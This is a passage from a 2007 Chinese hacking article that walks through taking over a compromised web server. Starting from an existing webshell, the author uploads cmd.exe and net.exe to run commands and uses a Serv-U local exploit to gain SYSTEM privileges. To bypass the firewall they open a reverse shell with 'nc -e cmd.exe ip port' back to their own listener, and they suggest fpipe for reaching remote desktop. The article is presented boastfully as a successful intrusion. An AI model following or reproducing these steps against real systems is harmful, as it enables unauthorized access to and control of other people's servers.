管理员的玩笑 管理员权限上传漏洞解析
2007-09-17 13:11:04 来源:WEB开发网好了,连上去了四处看看可是好象有一个文件夹居然不能操作啊!看看,上传文件总是出现如图三。开始还以为出现什么问题呢,明明不存在同名文件啊,以为是权限的原因,但是我不是已经写上了asp文件么?奇怪!看了半天看到文件夹的名字里有个#号。汗,不会是这个搞的鬼吧!当时一些管理员为防止人下载将数据库名字里加这个#,这位倒很有个性啊,在文件夹里加这个,不知道的人还真郁闷呢!嘿嘿!,在操作里将#改成%23,哈哈果然可以操作了。管理员第二个小玩笑就这样被破除了。
可以操作文件后当然是看是否可以提升权限了,打开海洋木马操作命令,出现的情况有点郁闷。提示文件无法被打开啊!如图四。一般这样的情况要么是cmd.exe被设置了权限要么就是这个目录不可以写,不能保存temp文件。好说,先上传个cmd.exe到这个目录试试。上传后在cmd.exe路径里填写该cmd.exe文件的路径,再执行netuser试试,哈哈,出来了吧!这是比较幸运的情况,有时候什么都可以传上去,但是cmd.exe就是传不上去,不过也没有关系啊!我一般直接传上net.exe然后在参数里写上user或者start,效果一样的好啊!如图五呵呵!这里就看看netstart里的有个server-u,哈哈。死定了他!其实这在海洋木马的查看进程里也可以看到的。于是传上server-u本地溢出工具,嘿嘿,执行命令成功!不用说了,这是system权限啊!轻松突破设置得不严密的权限。
本以为开个3389可以走人了,但是管理员的第四个玩笑可是有意思啊!居然除了80端口外什么端口都连不上,估计有什么我所不明白的软件吧!不过找了半天也不知道那个服务是防火墙。上次突破一台主机有windows自带防火墙,我直接server-u溢出停掉他了!我有system权限我怕谁?这里你禁止向内连接偶就不信你还能拒绝对外连接。马上本地监听端口,然后用溢出执行命令nc-ecmd.exeipport,如图六。不一会果然这里就有cmdshell了,最高权限哦!如图七。嘿嘿,管理员的防火墙在我们看来不也就是个玩笑了么?如果你想上他的3389的话,可以在夜深人静的时候上传fpipe执行
更多精彩
赞助商链接